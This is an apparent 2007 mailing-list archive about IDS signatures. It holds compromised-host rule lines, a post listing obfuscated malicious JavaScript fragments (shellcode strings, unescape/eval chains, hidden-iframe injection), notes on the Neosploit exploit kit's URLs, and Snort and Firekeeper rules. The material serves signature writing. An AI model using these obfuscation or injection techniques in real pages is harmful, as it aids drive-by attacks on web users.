        2510260 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (261) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (262) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (263) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (264) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (265) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (266) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510266 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (267) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510267 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (268) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510268 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (269) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510269 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (270) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510270 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (271) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510271 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (272) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510272 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (273) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510273 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (274) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510274 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (275) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510275 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (276) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510276 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (277) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510277 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (278) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510278 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (279) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510279 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (280) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510280 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (281) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510281 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (282) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510282 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (283) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510283 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (284) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510284 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (285) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510285 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (286) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510286 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (287) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510287 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (288) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510288 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (289) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510289 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (290) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510290 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (291) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510291 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (292) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510292 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (293) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510293 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (294) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510294 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (295) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510295 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (296) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510296 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (297) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510297 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (298) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510298 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (299) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510299 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (300) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510300 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (301) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510301 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (302) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510302 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (303) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510303 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (304) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510304 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (305) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510305 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (306) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510306 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (307) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510307 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (308) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510308 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (309) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510309 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (310) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510310 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (311) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510311 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (312) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510312 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (313) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510313 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (314) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510314 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (315) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510315 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (316) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510316 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (317) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510317 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (318) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510318 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (319) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510319 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (320) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510320 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (321) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510321 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (322) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510322 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (323) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510323 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (324) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510324 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (325) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510325 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (326) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510326 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (327) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510327 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (328) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510328 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (329) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510329 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (330) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510330 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (331) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510331 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (332) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510332 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (333) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510333 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (334) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510334 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (335) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510335 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (336) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510336 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (337) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510337 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (338) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510338 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (339) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510339 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (340) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510340 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (341) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510341 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (342) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510342 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (343) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510343 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (344) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510344 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (345) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510345 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (346) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510346 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (347) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510347 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (348) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510348 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (349) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510349 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (350) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510350 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (351) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510351 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (352) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510352 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (353) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510353 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (354) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts

From dxp2532 at gmail.com  Sat Dec  8 22:19:42 2007
From: dxp2532 at gmail.com (dxp)
Date: Sat Dec  8 22:26:18 2007
Subject: [Bleeding-sigs] Generic detection for malicious Javascript code
In-Reply-To: <1196779555.5799.2.camel@kinta>
References: <474FAA3F.4040105@sensorynetworks.com>
	<47509DCE.5070500@gmail.com> <1196475561.5728.19.camel@kinta>
	<47549D8B.7000602@gmail.com>  <1196779555.5799.2.camel@kinta>
Message-ID: <1197152382.6038.16.camel@kinta>

After reviewing all of the malicious web pages, which came across my
wires in the past year or so, this list is the result.  

It was actually quite interesting reviewing this data to see the
evolution of obfuscation techniques.  One can write separate signatures
for each of the samples but as Blake mentioned earlier it would be much
more beneficial to have generic detection.

Later on, I'll try to categorize the samples by the toolkits which they
came from for those who want to know which tools are used to exploit
their users.

Each separate line/block is a unique sample:

--- snip ---
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320"

unescape("%u4040%u4040%uFFE8%uFFFF%uC3FF%u8D5E%u104E")

document.write( unescape('%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%
6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E'))

'%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8_Jkzshynts%2A75ih%2A7%3D%
7D'

"l1hWsOPTVkPUd3tUFWAa7f9bF1hWP3tUecNXAOPa7vtTFW6I7a9KG3gWcW62OjPankV"

<ScrIPt lANGUAGE=jAVASCRiPt>fK67("HR4QN\)\|3HRoyq\)\|3H\rO\/dv4\)\|3D
\-\")</scrip>

var HtmlStrings=["=ejw!je>#ofx`dpoufou`kq#!
tuzmf>#ejtqmbz;opof#>=0ejw>=tdsjqu!"];

document.write(unescape("%3Cscript%3E%0D%0At%3D%2213%2C10%2C60%2C104%
2C101%2C97%2C100%2C62%0D%0Adocument.write%28t%29%3B%3C/script%3E"));

var plain_str = "\x4e\x63\x64\x63\x64\x18\x0f\x1c\x4e\x03\x03\x4e\x53";

dc("Re3@HoycfBQD3zWYl2ytl2velVrtzzX@HoycfBASPHXY_H2y")

document.writeln("var name = \"vist\";");
document.writeln("var expires = getExpDate(0,6,0);");
document.writeln("if (getCookie(name))");
document.writeln("{");
document.writeln("document.write(unescape(\"%3CIFraMe%20src%3Dhttp%3A
\/\/l61");

<script>document.write("\74\123\103\122\111\120\124\40\114\101\15
\12")</script>

decipher("fwl2btEOLwX_AhsKLJSz7hinGDdzUvajh@EzEIlwApEVRvZw")

eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXdGb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));

unescape(String.fromCharCode(37,117,57,48,57,48,37,117,57,48,57,48,37,117,53,52,101,98,37,117,55));

unescape("document.write%252528unescape%252528%252522%2525253Cscript%
2525253E%2525250D%2525250A%2525253C%25252521);

<body onLoad="A6cvftKAq('97B7A3A6b89dB2a3518d9d9486899384AA975DAAaf')
--- snip ---

On Tue, 2007-12-04 at 09:46 -0500, dxp wrote:
> For Neosploit toolkit initial exploit code (obfuscated javascript) is at
> $script_name?p=$username (eg. neo.cgi?p=168).  For versions prior to 1.5
> the $username is limited to 5 characters.  Later versions, 1.5 and 2.0
> (latest I think), increased this limit, to what I do not know but have
> seen 6 char.
> 
> Once exploit succeeds the embedded shellcode will retrieve that long
> URL.  Here's the structure ("%s?u%hu_%hu_%u_%hu_%lu_%lu_%lu_%s"):
> $script, OS, Browser, Browser's version, Exploit #, unknown,
> Custom hash of REMOTE_ADDR, Custom hash of HTTP_REFERER,
> $username (optional).
> 
> I think for generic malicious javascript detection another thread is
> needed.  I'll send some more info on what I've found useful shortly.
> 
> 
> On Mon, 2007-12-03 at 19:21 -0500, Blake Hartstein wrote: 
> > dxp,
> > Sorry it took me so long to reply to your email. We value your contribution.
> > 
> > dxp wrote:
> > > I should've mentioned that the first two rules will detect the request
> > > for a loader after client has been exploited.  The last rule detects the
> > > JS code containing the exploit.
> > >   
> > We are thinking of implementing some generic malicious JavaScript
> > detectors, your rule is a good start to detect, but there are many other
> > JavaScript strings we can detect.
> > I'm looking through my samples this week to see other variants
> > "unescape()" and etc, let me know if you have any other JavaScript style
> > attacks so I can add them also.
> > 
> > > What you've probably seen were requests for the Neosplit's JS script.
> > > Usually it has this form: "?p=user" 
> > >
> > > The toolkit builds the exploit URL at runtime (server side) and each
> > > number has a specific meaning for statistics and tracking.  One could
> > > combine both loader signatures into one.  There are several versions of
> > > Neosploit, latest is 2.0 I think, and 1.5 added another field that's why
> > > it differs from 1.0.
> > >   
> > So can you tell me what each numbers mean what in the URL (version,
> > tracking, etc)? Could they be longer/shorter than 3 or 4 digits?
> > Does the "?p=user" have any other identifiable characteristics?
> > 
> > >> http://site/page?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}[_\da-z]{0,6}
> > >>     
> > Blake
-- 

-=[ dxp ]=-
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xA3F3C6E3
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.bleedingthreats.net/pipermail/bleeding-sigs/attachments/20071208/c6d14158/attachment.pgp
From urule99 at gmail.com  Sun Dec  9 06:12:32 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Sun Dec  9 06:19:19 2007
Subject: [Bleeding-sigs] Re: Generic detection for malicious Javascript code
In-Reply-To: <1197152382.6038.16.camel@kinta>
References: <474FAA3F.4040105@sensorynetworks.com>	
	<47509DCE.5070500@gmail.com> <1196475561.5728.19.camel@kinta>	
	<47549D8B.7000602@gmail.com> <1196779555.5799.2.camel@kinta>
	<1197152382.6038.16.camel@kinta>
Message-ID: <475B8750.8060803@gmail.com>

Nice dxp,
I'll be adding rules for these JavaScript patterns shortly. If anyone
else has different malicious JavaScript patterns or encodings please
send them to the list.

Blake


dxp wrote:
> After reviewing all of the malicious web pages, which came across my
> wires in the past year or so, this list is the result.  
>
> It was actually quite interesting reviewing this data to see the
> evolution of obfuscation techniques.  One can write separate signatures
> for each of the samples but as Blake mentioned earlier it would be much
> more beneficial to have generic detection.
>
> Later on, I'll try to categorize the samples by the toolkits which they
> came from for those who want to know which tools are used to exploit
> their users.
>
> Each separate line/block is a unique sample:
>
> --- snip ---
> "%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320"
>
> unescape("%u4040%u4040%uFFE8%uFFFF%uC3FF%u8D5E%u104E")
>
> document.write( unescape('%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%
> 6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E'))
>
> '%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8_Jkzshynts%2A75ih%2A7%3D%
> 7D'
>
> "l1hWsOPTVkPUd3tUFWAa7f9bF1hWP3tUecNXAOPa7vtTFW6I7a9KG3gWcW62OjPankV"
>
> <ScrIPt lANGUAGE=jAVASCRiPt>fK67("HR4QN\)\|3HRoyq\)\|3H\rO\/dv4\)\|3D
> \-\")</scrip>
>
> var HtmlStrings=["=ejw!je>#ofx`dpoufou`kq#!
> tuzmf>#ejtqmbz;opof#>=0ejw>=tdsjqu!"];
>
> document.write(unescape("%3Cscript%3E%0D%0At%3D%2213%2C10%2C60%2C104%
> 2C101%2C97%2C100%2C62%0D%0Adocument.write%28t%29%3B%3C/script%3E"));
>
> var plain_str = "\x4e\x63\x64\x63\x64\x18\x0f\x1c\x4e\x03\x03\x4e\x53";
>
> dc("Re3@HoycfBQD3zWYl2ytl2velVrtzzX@HoycfBASPHXY_H2y")
>
> document.writeln("var name = \"vist\";");
> document.writeln("var expires = getExpDate(0,6,0);");
> document.writeln("if (getCookie(name))");
> document.writeln("{");
> document.writeln("document.write(unescape(\"%3CIFraMe%20src%3Dhttp%3A
> \/\/l61");
>
> <script>document.write("\74\123\103\122\111\120\124\40\114\101\15
> \12")</script>
>
> decipher("fwl2btEOLwX_AhsKLJSz7hinGDdzUvajh@EzEIlwApEVRvZw")
>
> eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXdGb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));
>
> unescape(String.fromCharCode(37,117,57,48,57,48,37,117,57,48,57,48,37,117,53,52,101,98,37,117,55));
>
> unescape("document.write%252528unescape%252528%252522%2525253Cscript%
> 2525253E%2525250D%2525250A%2525253C%25252521);
>
> <body onLoad="A6cvftKAq('97B7A3A6b89dB2a3518d9d9486899384AA975DAAaf')
> --- snip ---
>
> On Tue, 2007-12-04 at 09:46 -0500, dxp wrote:
>   
>> For Neosploit toolkit initial exploit code (obfuscated javascript) is at
>> $script_name?p=$username (eg. neo.cgi?p=168).  For versions prior to 1.5
>> the $username is limited to 5 characters.  Later versions, 1.5 and 2.0
>> (latest I think), increased this limit, to what I do not know but have
>> seen 6 char.
>>
>> Once exploit succeeds the embedded shellcode will retrieve that long
>> URL.  Here's the structure ("%s?u%hu_%hu_%u_%hu_%lu_%lu_%lu_%s"):
>> $script, OS, Browser, Browser's version, Exploit #, unknown,
>> Custom hash of REMOTE_ADDR, Custom hash of HTTP_REFERER,
>> $username (optional).
>>
>> I think for generic malicious javascript detection another thread is
>> needed.  I'll send some more info on what I've found useful shortly.
>>
>>
>> On Mon, 2007-12-03 at 19:21 -0500, Blake Hartstein wrote: 
>>     
>>> dxp,
>>> Sorry it took me so long to reply to your email. We value your contribution.
>>>
>>> dxp wrote:
>>>       
>>>> I should've mentioned that the first two rules will detect the request
>>>> for a loader after client has been exploited.  The last rule detects the
>>>> JS code containing the exploit.
>>>>   
>>>>         
>>> We are thinking of implementing some generic malicious JavaScript
>>> detectors, your rule is a good start to detect, but there are many other
>>> JavaScript strings we can detect.
>>> I'm looking through my samples this week to see other variants
>>> "unescape()" and etc, let me know if you have any other JavaScript style
>>> attacks so I can add them also.
>>>
>>>       
>>>> What you've probably seen were requests for the Neosplit's JS script.
>>>> Usually it has this form: "?p=user" 
>>>>
>>>> The toolkit builds the exploit URL at runtime (server side) and each
>>>> number has a specific meaning for statistics and tracking.  One could
>>>> combine both loader signatures into one.  There are several versions of
>>>> Neosploit, latest is 2.0 I think, and 1.5 added another field that's why
>>>> it differs from 1.0.
>>>>   
>>>>         
>>> So can you tell me what each numbers mean what in the URL (version,
>>> tracking, etc)? Could they be longer/shorter than 3 or 4 digits?
>>> Does the "?p=user" have any other identifiable characteristics?
>>>
>>>       
>>>>> http://site/page?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}[_\da-z]{0,6}
>>>>>     
>>>>>           
>>> Blake
>>>       

From jim at jamesmcquaid.com  Wed Dec 12 03:13:46 2007
From: jim at jamesmcquaid.com (Jim McQuaid)
Date: Wed Dec 12 03:20:35 2007
Subject: [Bleeding-sigs] RBN codec drop sig
In-Reply-To: <20071209120010.34A09230014@sb03.us.bleedingsnort.com>
Message-ID: <78675.64617.qm@web56011.mail.re3.yahoo.com>

I'm testing a simple sig for Firefox Firekeeper for
use on my kids computers.  The allowed syntax is
slightly different:

drop(url_re:"/\.codec$|\.exe$/i";
reference:url,www.bleedingthreats.net;)

On my LAN, it silently drops many of the RBN fake
codec malware files.  Can any of you test this to
validate that it is not one of my other security
applications doing the dropping?

Thank you,

James

From cunningpike at gmail.com  Wed Dec 12 22:56:38 2007
From: cunningpike at gmail.com (CunningPike)
Date: Wed Dec 12 23:03:31 2007
Subject: [Bleeding-sigs] Proposed rev for 2002383
Message-ID: <47606726.2000106@gmail.com>

Basically, increasing the dsize from <30 to <65 - we missed an attempt
the other day because the response from this server was longer than 30
bytes:

alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:"BLEEDING-EDGE SCAN
Potential FTP Brute-Force attempt"; flow:from_server,established;
dsize:<65; content:"530 "; depth:4;
pcre:"/530\s+(Login|User|Failed|Not)/smi"; classtype:unsuccessful-user;
threshold: type threshold, track by_dst, count 5, seconds 300;
sid:2002383; rev:8;)

Any objections?

CP

From urule99 at gmail.com  Thu Dec 13 04:05:09 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Thu Dec 13 04:11:50 2007
Subject: [Bleeding-sigs] Proposed rev for 2002383
In-Reply-To: <47606726.2000106@gmail.com>
References: <47606726.2000106@gmail.com>
Message-ID: <4760AF75.30802@gmail.com>

Cool CP,
What did your FTP response look like? what was the extra/other data in
the false negative?
I'm using the 5 hour rule, to assume there are no objections. I've made
those changes, let us know if you experience any problems.
Blake


CunningPike wrote:
> Basically, increasing the dsize from <30 to <65 - we missed an attempt
> the other day because the response from this server was longer than 30
> bytes:
>
> alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:"BLEEDING-EDGE SCAN
> Potential FTP Brute-Force attempt"; flow:from_server,established;
> dsize:<65; content:"530 "; depth:4;
> pcre:"/530\s+(Login|User|Failed|Not)/smi"; classtype:unsuccessful-user;
> threshold: type threshold, track by_dst, count 5, seconds 300;
> sid:2002383; rev:8;)
>
> Any objections?
>
> CP
>   
From urule99 at gmail.com  Thu Dec 13 04:13:35 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Thu Dec 13 04:20:19 2007
Subject: [Bleeding-sigs] RBN codec drop sig
In-Reply-To: <78675.64617.qm@web56011.mail.re3.yahoo.com>
References: <78675.64617.qm@web56011.mail.re3.yahoo.com>
Message-ID: <4760B16F.7010805@gmail.com>

James,
You attempting to drop all files with the extensions: EXE or CODEC, is
that right?
I'll get around to testing this before the end of the week and let you
know how it goes.

Blake



Jim McQuaid wrote:
> I'm testing a simple sig for Firefox Firekeeper for
> use on my kids computers.  The allowed syntax is
> slightly different:
>
> drop(url_re:"/\.codec$|\.exe$/i";
> reference:url,www.bleedingthreats.net;)
>
> On my LAN, it silently drops many of the RBN fake
> codec malware files.  Can any of you test this to
> validate that it is not one of my other security
> applications doing the dropping?
>
> Thank you,
>
> James
>   

From urule99 at gmail.com  Thu Dec 13 05:41:48 2007
